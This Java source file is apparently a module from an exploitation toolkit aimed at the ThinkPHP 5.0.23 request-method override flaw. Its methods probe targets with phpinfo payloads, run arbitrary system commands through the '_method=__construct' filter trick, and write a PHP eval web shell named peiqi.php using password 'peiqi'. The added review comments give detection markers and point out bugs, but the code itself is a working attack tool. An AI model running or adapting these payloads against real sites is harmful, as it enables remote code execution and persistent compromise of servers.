package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;
import java.util.ArrayList;
/**
 * Payload module for the ThinkPHP 5.0.x request-method override issue.
 *
 * Original header comment (translated): ThinkPHP &lt;= 5.0.23; requires that a
 * method route such as {@code captcha} exists on the target.
 *
 * NOTE(review): every request built in this class carries the same marker in
 * its POST body - {@code _method=__construct} combined with {@code filter[]=...}
 * - which is the string a WAF or IDS signature can key on. The server-side fix
 * is running a ThinkPHP release newer than 5.0.23 (per the header above).
 */
public class tp5023 implements BasePayload {
    /**
     * Probes {@code url} for the vulnerability.
     *
     * Each candidate body is POSTed to {@code url + "/?s=captcha&test=-1"}; the
     * first response whose body contains {@code "PHP Version"} (phpinfo output)
     * is taken as confirmation and reported together with the request used.
     *
     * @param url base URL of the target, used as-is (no trailing-slash handling)
     * @return a successful {@link Result} naming the request that worked, or a
     *         failed one with an empty detail string
     * @throws Exception declared by the interface; failures of individual
     *         requests are caught and printed, never propagated
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        String payload_url = url + "/?s=captcha&test=-1";
        // Double-brace initialisation: this creates an anonymous ArrayList subclass.
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1");
            add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo");
            add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
        }};
        for (String payload : payloads) {
            try {
                HttpRequest req = HttpRequest.post(payload_url).send(payload);
                if (req.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.23 RCE", payload_url + " Post: " + payload);
                }
            } catch (Exception e) {
                // A network/HTTP error on one variant is printed and the next variant is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0.23 RCE", "");
    }

    /**
     * Sends {@code cmd} to the target through the same override and returns the
     * part of the response body that precedes the first {@code '<'}.
     *
     * Behaviour to be aware of before relying on the result:
     * <ul>
     *   <li>{@code cmd} is inserted into the request body verbatim (no encoding).</li>
     *   <li>The first variant whose response body contains a {@code '<'} ends the
     *       loop with {@code Result(true, ...)}, whether or not anything ran.</li>
     *   <li>A body with no {@code '<'} makes {@code indexOf} return -1, so
     *       {@code substring(0, -1)} throws; that exception is caught below,
     *       printed, and the next variant is tried.</li>
     * </ul>
     *
     * Not marked {@code @Override}; whether {@code BasePayload} declares this
     * method cannot be determined from this file.
     *
     * @param url base URL of the target
     * @param cmd command text placed into the request body
     * @return {@code Result(true, "", text)} for the first response containing
     *         {@code '<'} (the whole body when nothing precedes it), otherwise
     *         {@code Result(false, null, null)}
     * @throws Exception declared; per-request failures are caught and printed
     */
    public Result exeVUL(String url, String cmd) throws Exception {
        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + cmd);
            add("s=" + cmd + "&_method=__construct&method=get&filter[]=system");
            add("s=" + cmd + "&_method=__construct&method&filter[]=system");
        }};
        for (String payload : payloads) {
            try {
                String response = HttpRequest.post(payload_url).send(payload).body();
                // Throws StringIndexOutOfBoundsException when the body has no '<' (indexOf == -1).
                String res = response.substring(0, response.indexOf("<"));
                if (res.equals("")) {
                    // Nothing precedes the first '<': hand back the full body instead.
                    return new Result(true, "", response);
                }
                return new Result(true, "", res);
            } catch (Exception e) {
                // Includes the substring failure above; printed, then the next variant is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

    /**
     * Attempts to write a file named {@code peiqi.php} under the target's web
     * root and confirms by GETting {@code url + "/peiqi.php"} and checking for
     * HTTP 200.
     *
     * Defender notes: the file name {@code peiqi.php} and the POST parameter
     * name {@code peiqi} are hard-coded, so an unexpected {@code peiqi.php}
     * under a ThinkPHP document root is a direct indicator of this tool. The
     * verification GET runs after every variant regardless of the POST outcome,
     * so a site that answers 200 for unknown paths is reported as successful
     * even when nothing was written.
     *
     * @param url base URL of the target
     * @return {@code Result(true, null, ...)} carrying the file path and
     *         parameter name on a 200 response, otherwise
     *         {@code Result(false, null, null)}
     * @throws Exception declared; per-request failures are caught and printed
     */
    @Override
    public Result getShell(String url) throws Exception {
        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
            add("_method=__construct&filter[]=system&method=GET&get[]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
            add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
            add("_method=__construct&filter[]=assert&method=GET&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
        }};
        for (int i = 0; i < payloads.size(); i++) {
            try {
                // The POST response body is read but never inspected; only the follow-up GET status matters.
                String res = HttpRequest.post(payload_url).send(payloads.get(i)).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, null, url + "/peiqi.php Pass:peiqi");
                }
            } catch (Exception e) {
                // A failure on one variant is printed and the next variant is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }
}